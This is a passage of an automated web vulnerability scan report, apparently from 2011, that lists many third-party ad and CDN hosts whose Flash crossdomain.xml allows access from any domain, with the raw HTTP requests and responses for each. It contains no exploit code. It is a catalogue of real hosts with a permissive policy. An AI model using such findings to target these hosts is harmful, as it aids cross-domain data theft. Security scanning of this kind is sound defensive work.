Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "49e4e5b932ff87fda571934152e3458c:1267584532"
Last-Modified: Wed, 03 Mar 2010 02:48:52 GMT
Accept-Ranges: bytes
Content-Length: 141
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:10:41 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.23. https://cdns.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://cdns.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdns.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:14 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.24. http://clk.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.25. http://companion.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://companion.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: companion.adap.tv

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: close
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.26. http://control.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://control.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/xml
Connection: Keep-Alive
Content-Length: 194

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.27. http://d3fd89.r.axf8.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3fd89.r.axf8.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3fd89.r.axf8.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT
Accept-Ranges: bytes
ETag: "56b3a475ee27cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:58:59 GMT
Connection: close
Content-Length: 153

<?xml version="1.0"?>
<!-- http://www.adobe.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.28. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:13:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.29. http://findnsave.sacbee.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://findnsave.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: findnsave.sacbee.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 15 Dec 2009 23:03:45 GMT
Accept-Ranges: bytes
ETag: "ed84bfdada7dca1:0"
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:28 GMT
Connection: close
Content-Length: 221

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<
...[SNIP]...

6.30. http://gannett.gcion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.31. http://goku.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:45 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.32. http://gscounters.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2dc1"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:44:37 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.33. http://i.w55c.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:47 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 bfi061002 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

6.34. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 01:22:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.35. http://imp.fetchback.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.36. http://init.lingospot.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://init.lingospot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: init.lingospot.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=7200
Content-Type: text/xml
Etag: "-5d35a762ba6b2244"
Last-Modified: Sun, 04 Sep 2011 00:58:31 GMT
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:58:31 GMT
Server: Google Frontend

<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.37. http://js.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.38. http://load.exelator.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3801752829"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sun, 04 Sep 2011 01:10:56 GMT
Server: HTTP server
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 AN-AMP_TM uproxy-3

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

6.39. http://load.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1313195660000"
Last-Modified: Sat, 13 Aug 2011 00:34:20 GMT
host: rcv-srv34
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:17:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.40. http://log.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://log.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: Keep-Alive
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.41. http://metrics.sprint.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www372
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.42. http://motifcdn2.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://motifcdn2.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: motifcdn2.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2179194/HYSA_Champion_Asterisk_300x250_30k.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "adb6a2c1ae7705ddf1599956b34e42c2:1222813852"
Last-Modified: Tue, 30 Sep 2008 22:30:52 GMT
Accept-Ranges: bytes
Content-Type: application/xml
Vary: Accept-Encoding
Content-Length: 339
Date: Sun, 04 Sep 2011 00:43:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://nmcharlotte.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:26 GMT
Server: Omniture DC/2.0.0
xserver: www28
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.44. http://odb.outbrain.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.45. http://p.brilig.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.brilig.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:15 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 19 Jul 2011 01:45:29 GMT
ETag: "55fb1-ab-4a86245412040"
Accept-Ranges: bytes
Content-Length: 171
X-Brilig-D: D=75
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

</cross-domain-policy>
6.46. http://paid.outbrain.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://paid.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: paid.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 01:23:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.47. http://pbid.pro-market.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pbid.pro-market.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: pbid.pro-market.net
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NOI DSP COR NID CURa ADMo TAIa PSAo PSDo OUR SAMo BUS UNI PUR COM NAV INT DEM CNT STA PRE LOC"
ANServer: app2.ny
ETag: W/"207-1312809562000"
Last-Modified: Mon, 08 Aug 2011 13:19:22 GMT
Content-Type: application/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 01:10:59 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.48. http://pix04.revsci.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:42:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.49. http://pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:06 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.50. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.51. http://premium.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://premium.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: premium.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:38:09 GMT
